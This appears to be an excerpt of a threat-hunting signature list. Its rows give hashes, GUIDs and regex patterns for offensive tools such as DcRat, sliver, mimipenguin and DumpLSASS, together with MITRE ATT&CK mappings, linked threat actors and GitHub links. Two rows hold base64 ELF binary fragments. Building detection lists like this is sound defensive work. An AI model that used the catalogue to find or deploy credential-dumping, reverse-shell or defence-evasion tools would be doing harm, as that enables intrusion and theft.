"*f04f854c5bbfa8a33358efd2bb3e700e9be687250548a1cb21de1d661b5f04ff*",".{0,1000}f04f854c5bbfa8a33358efd2bb3e700e9be687250548a1cb21de1d661b5f04ff.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","43691" "*f05885a68c1f16c7cbaa3657bbc57f54b7755910d1c96366543cc428729abcb3*",".{0,1000}f05885a68c1f16c7cbaa3657bbc57f54b7755910d1c96366543cc428729abcb3.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","#filehash","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","43694" "*f05e2bbc6da71e91b59512e9f50219dd6852481d52cca02a0b780dd29ce52fb7*",".{0,1000}f05e2bbc6da71e91b59512e9f50219dd6852481d52cca02a0b780dd29ce52fb7.{0,1000}","offensive_tool_keyword","hotkeyz","Hotkey-based keylogger for Windows","T1056.001","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/yo-yo-yo-jbo/hotkeyz","1","0","#filehash","N/A","9","1","21","1","2024-10-17T17:50:19Z","2024-06-03T21:23:16Z","43696" "*f05ff84ba4bb193182883786c635cac0643b51d7046cedfc48c352ca415d348a*",".{0,1000}f05ff84ba4bb193182883786c635cac0643b51d7046cedfc48c352ca415d348a.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","43697" "*F06EAC7B-6996-4E78-B045-0DF6ED201367*",".{0,1000}F06EAC7B\-6996\-4E78\-B045\-0DF6ED201367.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","#GUIDproject","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","43700" "*f06f0e1867889b5f70cbb8e9050d25b8801c15b93fe4b6a4d00841c6666ab0a6*",".{0,1000}f06f0e1867889b5f70cbb8e9050d25b8801c15b93fe4b6a4d00841c6666ab0a6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","43701" "*f0761ad307781bdf8da94765abd1a2041ac12a52c7fdde85f00b2b2cab6d6ce8*",".{0,1000}f0761ad307781bdf8da94765abd1a2041ac12a52c7fdde85f00b2b2cab6d6ce8.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","43703" "*f079fee94bbb57fd41bab9139839f5458137b0a8bcd692642f22f08ce647cae2*",".{0,1000}f079fee94bbb57fd41bab9139839f5458137b0a8bcd692642f22f08ce647cae2.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. 
This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","#filehash","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","43704" "*f086a7ee9ea8f85d34a9dada68c8a885ca4222b97ab568e2b5397e09eece98bc*",".{0,1000}f086a7ee9ea8f85d34a9dada68c8a885ca4222b97ab568e2b5397e09eece98bc.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","43705" "*f0879a3367e156039b9f4c2b34fb0b6b02805d2ac74c7bd0dbf4b97f97b41411*",".{0,1000}f0879a3367e156039b9f4c2b34fb0b6b02805d2ac74c7bd0dbf4b97f97b41411.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43706" "*f089979c1b33e75e2819d1fe15e8b50dafe0c075a5ad3f98207b51bfdff69c77*",".{0,1000}f089979c1b33e75e2819d1fe15e8b50dafe0c075a5ad3f98207b51bfdff69c77.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43707" "*f09a777ff1bb221184f60cea61e092b51b096f25cfe5650d84516c09013233a6*",".{0,1000}f09a777ff1bb221184f60cea61e092b51b096f25cfe5650d84516c09013233a6.{0,1000}","offensive_tool_keyword","Group3r","Find 
vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","43709" "*f09d817e9523c32b31b29f2b6de48358e14b767d3f27709186f8629f35c991d2*",".{0,1000}f09d817e9523c32b31b29f2b6de48358e14b767d3f27709186f8629f35c991d2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","43710" "*f0a08cae1d8aaea09f48e99965a1ea070de40ddc75830112cfa46f5c37c26306*",".{0,1000}f0a08cae1d8aaea09f48e99965a1ea070de40ddc75830112cfa46f5c37c26306.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","43711" "*F0A581F1-D9BE-42EB-B262-E6A7CC839D2B*",".{0,1000}F0A581F1\-D9BE\-42EB\-B262\-E6A7CC839D2B.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43713" "*f0aad423001bc47bc3b1242f8cef69109262c413f151d5cf212cdd2dc341ceb3*",".{0,1000}f0aad423001bc47bc3b1242f8cef69109262c413f151d5cf212cdd2dc341ceb3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - 
T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","43714" "*f0b1a06aa6d5ea27814565755c6bfe2520dd71c4df02768fe7d621c3c3d0db75*",".{0,1000}f0b1a06aa6d5ea27814565755c6bfe2520dd71c4df02768fe7d621c3c3d0db75.{0,1000}","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","0","#filehash","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","43715" "*f0c4face818f1c021228c140e453fc43b214141ed0273bce57be44cae6461bb2*",".{0,1000}f0c4face818f1c021228c140e453fc43b214141ed0273bce57be44cae6461bb2.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","43717" "*f0d60a0c31f6aaa68c096553a8b983f2c9c78c96022118d1e1066012ec9c3268*",".{0,1000}f0d60a0c31f6aaa68c096553a8b983f2c9c78c96022118d1e1066012ec9c3268.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","43721" "*f0d99239fa828a18f0756ec717a663b5e64af9cf4e4130ec0a27bdf5d592ac96*",".{0,1000}f0d99239fa828a18f0756ec717a663b5e64af9cf4e4130ec0a27bdf5d592ac96.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - 
T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","43722" "*f0df80978b3a563077def7ba919e2f49e5883d24176e6b3371a8eef1efe2b06a*",".{0,1000}f0df80978b3a563077def7ba919e2f49e5883d24176e6b3371a8eef1efe2b06a.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","43725" "*f0e0e7cd303662f47ec9f5df7778faa0ff2a15110d21f5afbea031c6b02f8d9b*",".{0,1000}f0e0e7cd303662f47ec9f5df7778faa0ff2a15110d21f5afbea031c6b02f8d9b.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","43726" "*f0e1e5a2b52773889dc1e7c44c5a80716a0dd98beee46b705748773e292e1d88*",".{0,1000}f0e1e5a2b52773889dc1e7c44c5a80716a0dd98beee46b705748773e292e1d88.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#filehash #linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","43727" 
"*f0e56c67cdf3a1f4dfc21bcff9d9e760e72fe34ebd32ab7ea0f1be9fc7e05e75*",".{0,1000}f0e56c67cdf3a1f4dfc21bcff9d9e760e72fe34ebd32ab7ea0f1be9fc7e05e75.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","43728" "*f0f1873d2b61cd03c1daa52ec0cb279676b118507c9031e26d132b8f4187b2bd*",".{0,1000}f0f1873d2b61cd03c1daa52ec0cb279676b118507c9031e26d132b8f4187b2bd.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","43729" "*f0f81571b19a8af0b074b80fc965fef5c2afa705143cade50786d944c24a0494*",".{0,1000}f0f81571b19a8af0b074b80fc965fef5c2afa705143cade50786d944c24a0494.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","43730" "*f0f8f8de178f91de8fe054b6450fa0d2291ad7693035f2c52df800e9168fb22d*",".{0,1000}f0f8f8de178f91de8fe054b6450fa0d2291ad7693035f2c52df800e9168fb22d.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral 
Movement","https://github.com/icyguider/LatLoader","1","0","#filehash","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","43731" "*f0fc4517a1a74f1922e41886cc4584c7683f7726111e40f03b26edc6bd9c6642*",".{0,1000}f0fc4517a1a74f1922e41886cc4584c7683f7726111e40f03b26edc6bd9c6642.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","43732" "*f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAiiAAAA8AAAAAcAAAAAEAAAMdv341NDU2oCieGwZs2AW15SaAIAIylqEFFQieFqZljNgIlBBLMEsGbNgEOwZs2Ak1lqP1jNgEl5*",".{0,1000}f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAiiAAAA8AAAAAcAAAAAEAAAMdv341NDU2oCieGwZs2AW15SaAIAIylqEFFQieFqZljNgIlBBLMEsGbNgEOwZs2Ak1lqP1jNgEl5.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#base64 #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","43733" 
"*f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAzgAAAAAAAAAkAQAAAAAAAAAQAAAAAAAAailYmWoCX2oBXg8FSJdSxwQkAgAjKUiJ5moQWmoxWA8FajJYDwVIMfZqK1gPBUiXagNeSP*",".{0,1000}f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAzgAAAAAAAAAkAQAAAAAAAAAQAAAAAAAAailYmWoCX2oBXg8FSJdSxwQkAgAjKUiJ5moQWmoxWA8FajJYDwVIMfZqK1gPBUiXagNeSP.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#base64 #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","43734" "*f108ce909b11c42406540ae67c339f22fd9842db9ecdc5765bcd2b35f5723198*",".{0,1000}f108ce909b11c42406540ae67c339f22fd9842db9ecdc5765bcd2b35f5723198.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","43735" "*f109966b6fc1f0ea412a05078baaa79667529be0a387070da7c458a914a07e8e*",".{0,1000}f109966b6fc1f0ea412a05078baaa79667529be0a387070da7c458a914a07e8e.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","43736" 
"*f116626cb8bd2787d19bbb0dbf578cbd09093e19ab27911beb1f61d46abb3845*",".{0,1000}f116626cb8bd2787d19bbb0dbf578cbd09093e19ab27911beb1f61d46abb3845.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","43737" "*f1168b6e2d5fc6d6edba534cee25fc9a4d9b28eca6435a9111449ba617626882*",".{0,1000}f1168b6e2d5fc6d6edba534cee25fc9a4d9b28eca6435a9111449ba617626882.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","43738" "*f118a70fa7b02b858bb4fffb96d9a861e4b02f62df054a0d69854449682c8f85*",".{0,1000}f118a70fa7b02b858bb4fffb96d9a861e4b02f62df054a0d69854449682c8f85.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","43739" "*f121ccc497eca1f3692c9ac8e8be1c1c1a4be250d05f7a23e2f71b8240da1ea5*",".{0,1000}f121ccc497eca1f3692c9ac8e8be1c1c1a4be250d05f7a23e2f71b8240da1ea5.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","43741" "*f12a335a790c4d47c3eb5182ec43afd523dc6ab354645f0167fe7206073b61e5*",".{0,1000}f12a335a790c4d47c3eb5182ec43afd523dc6ab354645f0167fe7206073b61e5.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","43742" "*f13668c26c13b4e0a8a56ffbc758331f311bcb033c1c74b1711a2258d6ed2e22*",".{0,1000}f13668c26c13b4e0a8a56ffbc758331f311bcb033c1c74b1711a2258d6ed2e22.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","43744" "*f140d5c67e7a151d9bba6d8c456dd44004f14056acd3257aa2203b30e959ef39*",".{0,1000}f140d5c67e7a151d9bba6d8c456dd44004f14056acd3257aa2203b30e959ef39.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43749" "*F142A341-5EE0-442D-A15F-98AE9B48DBAE*",".{0,1000}F142A341\-5EE0\-442D\-A15F\-98AE9B48DBAE.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","43750" "*F142A341-5EE0-442D-A15F-98AE9B48DBAE*",".{0,1000}F142A341\-5EE0\-442D\-A15F\-98AE9B48DBAE.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","43751" "*F142A341-5EE0-442D-A15F-98AE9B48DBAE*",".{0,1000}F142A341\-5EE0\-442D\-A15F\-98AE9B48DBAE.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","43752" 
"*F142A341-5EE0-442D-A15F-98AE9B48DBAE*",".{0,1000}F142A341\-5EE0\-442D\-A15F\-98AE9B48DBAE.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","43753" "*F142A341-5EE0-442D-A15F-98AE9B48DBAE*",".{0,1000}F142A341\-5EE0\-442D\-A15F\-98AE9B48DBAE.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","43754" "*f1452a47c21f37e9d581f706dce8862a1d4d045033470c4080809fb4a205e42c*",".{0,1000}f1452a47c21f37e9d581f706dce8862a1d4d045033470c4080809fb4a205e42c.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","43755" "*f150333a3943f2c7398e0dd3f97a2cb3f1c1653a220785a977ba9a7ff692dab1*",".{0,1000}f150333a3943f2c7398e0dd3f97a2cb3f1c1653a220785a977ba9a7ff692dab1.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","#filehash","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","43757" "*f1525ffa97500a9aa64138541d1e91f403e494d8a6eef7bcb1f1de7e8261755e*",".{0,1000}f1525ffa97500a9aa64138541d1e91f403e494d8a6eef7bcb1f1de7e8261755e.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","#filehash","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","43759" "*F1527C49-CA1F-4994-BB9D-E20DD2C607FD*",".{0,1000}F1527C49\-CA1F\-4994\-BB9D\-E20DD2C607FD.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","#GUIDproject","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","43760" "*f154fc90b680ec716ea189245556b03b214e829a64b3f4ca23ca78beb4701171*",".{0,1000}f154fc90b680ec716ea189245556b03b214e829a64b3f4ca23ca78beb4701171.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43762" "*f15785e3f3b824872a6b9dd8c550886179d3e636f0f1939d2b45c411701c72f8*",".{0,1000}f15785e3f3b824872a6b9dd8c550886179d3e636f0f1939d2b45c411701c72f8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","43763" "*f15b1b50831974a8a4ac09cce5b7b9f5cc71404ee4cabe67ee2f95e890419d3c*",".{0,1000}f15b1b50831974a8a4ac09cce5b7b9f5cc71404ee4cabe67ee2f95e890419d3c.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","43764" 